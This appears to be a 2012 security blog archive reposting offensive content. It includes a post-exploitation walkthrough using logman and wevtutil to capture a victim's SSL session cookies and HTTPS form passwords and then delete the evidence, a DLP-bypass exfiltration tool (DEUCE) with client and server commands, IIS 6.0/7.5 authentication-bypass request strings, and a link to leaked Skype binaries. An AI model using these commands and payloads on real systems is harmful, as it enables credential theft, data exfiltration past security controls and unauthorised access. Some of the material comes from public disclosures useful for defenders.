Jul 21, 2012

Sidejacking SSL Cookies (and more) with ETW - Post Exploitation

From Pauldotcom

ETW (Event Tracing for Windows) is pretty awesome. You can do all kinds of crazy cool stuff with it. For example, imagine you've just exploited your target to find the CFO is using IE to browse to the companies internal ERP (Enterprise Resource Planning) system. Showing the executives that you've got access to the financials is a great way to demonstrate risk in terms that are understood in mahogany row. You need to steal his cookie, but it is non-persistent (memory only... not on disk), the session is SSL encrypted and it was negotiated before you got on his machine. Windows Event Tracing to the rescue. First you turn on Event tracing for the WinInet process.
cd \temp
logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets

Then you let you target do a little web browsing and wait for the good to show up in your new "cookiesteal.etl" event log.
After a few minutes you grab the goods!!

wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

And it isn't just cookies recorded in the event logs. You can capture all the POST information that is passed back and forth including password from FORM based HTTPS sites!
wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"
Or you could do some additional reconnaissance by looking at DNS requests, Proxy information, DNS Cache snooping and more.
wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"
wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"
wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

When your done you you simply turn off your Event logging and delete your event log.
logman stop CookieStealer -ets
del cookiesteal.etl

Source: http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html

If you like my blog, Please Donate Me

Jul 20, 2012

DEUCE - Bypassing DLP with Cookies

If you want to download or view the code, please go to the Source.

DEUCE went from simple concept to a multi-encoding and encryption DLP bypass tool. The program simply takes an input file and creates a cookie for each line.  DEUCE has the ability to encrypt via AES, hash with MD5 or use a custom multi-encode with a 3 times replacement cipher.  The program then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. The MD5 is a one way hash that would need to be cracked. However, if an attacker sent a list of social security numbers it would only take minutes to crack the 9 digits number using a tool like Hashcat. In the Python code you can change the name of the cookie, just make sure you change it in the client and the server

Using DEUCE is simple. By default the server listens on all interfaces and on port 80. The DEUCE client has more options such as encryption and encoding methods, target URL and input file. Example usage below: 

  • python deuce_server.py -o ouput.txt
    • This starts the listening server on all interfaces on port 80 with the output being output.txt
  • python deuce_client.py -u http://location_of_deuce_server  -i inputfile.txt -m
    • This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server using the -m tells DEUCE to use multi-encode mode.

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there. It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means. 

Source: http://blog.infosecsee.com/2012/07/bypassing-dlp-with-cookies.html

If you like my blog, Please Donate Me

IIS 6.0/7.5 Vulnerabilities [moderate risk] - ISOWAREZ BDAY RELEASE

------------------------------------------------------------------------------------------------------------------------------------------------------------ Title: Microsoft IIS 6.0 with PHP installed Authentication Bypass Affected software: Microsoft IIS 6.0 with PHP installed (tested on Windows Server 2003 SP1 running PHP5) Details: By sending a special request to the IIS 6.0 Service running PHP the attacker can successfully bypass access restrictions. Take for example: 1.) IIS/6.0 has PHP installed 2.) There is a Password Protected directory configured --> An attacker can access PHP files in the password protected directory and execute them without supplying proper credentials. --> Example request (path to the file): /admin::$INDEX_ALLOCATION/index.php IIS/6.0 will gracefully load the PHP file inside the "admin" directory if the ::$INDEX_ALLOCATION postfix is appended to directory name. This can result in accessing administrative files and under special circumstances execute arbirary code remotely. ------------------------------------------------------------------------------------------------------------------------------------------------------------ Title: Microsoft IIS 7.5 Classic ASP Authentication Bypass Affected Software: Microsoft IIS 7.5 with configured Classic ASP and .NET Framework 4.0 installed (.NET Framework 2.0 is unaffected, other .NET frameworks have not been tested) (tested on Windows 7) Details: By appending ":$i30:$INDEX_ALLOCATION" to the directory serving the classic ASP file access restrictions can be successfully bypassed. Take this Example: 1.) Microsoft IIS 7.5 has Classic ASP configured (it allows serving .asp files) 2.) There is a password protected directory configured that has administrative asp scripts inside 3.) An attacker requests the directory with :$i30:$INDEX_ALLOCATION appended to the directory name 4.) IIS/7.5 gracefully executes the ASP script without asking for proper credentials ------------------------------------------------------------------------------------------------------------------------------------------------------------ Title: Microsoft IIS 7.5 .NET source code disclosure and authentication bypass Affected Software: Microsoft IIS/7.5 with PHP installed in a special configuration (Tested with .NET 2.0 and .NET 4.0) (tested on Windows 7) The special configuration requires the "Path Type" of PHP to be set to "Unspecified" in the Handler Mappings of IIS/7.5 Details: The authentication bypass is the same as the previous vulnerabilities: Requesting for example http://<victimIIS75>/admin:$i30:$INDEX_ALLOCATION/admin.php will run the PHP script without asking for proper credentials. By appending /.php to an ASPX file (or any other file using the .NET framework that is not blocked through the request filtering rules, like misconfigured: .CS,.VB files) IIS/7.5 responds with the full source code of the file and executes it as PHP code. This means that by using an upload feature it might be possible (under special circumstances) to execute arbitrary PHP code. Example: Default.aspx/.php 

Source: http://seclists.org/fulldisclosure/2012/Jun/189

If you like my blog, Please Donate Me

Jul 17, 2012

Skype Source Code Leak

additional details:


skypekit binaries for Windows and x86_Linux + SDK

skype55_59_deobfuscated_binaries (Windows)

Source: https://joindiaspora.com/posts/1799228

If you like my blog, Please Donate Me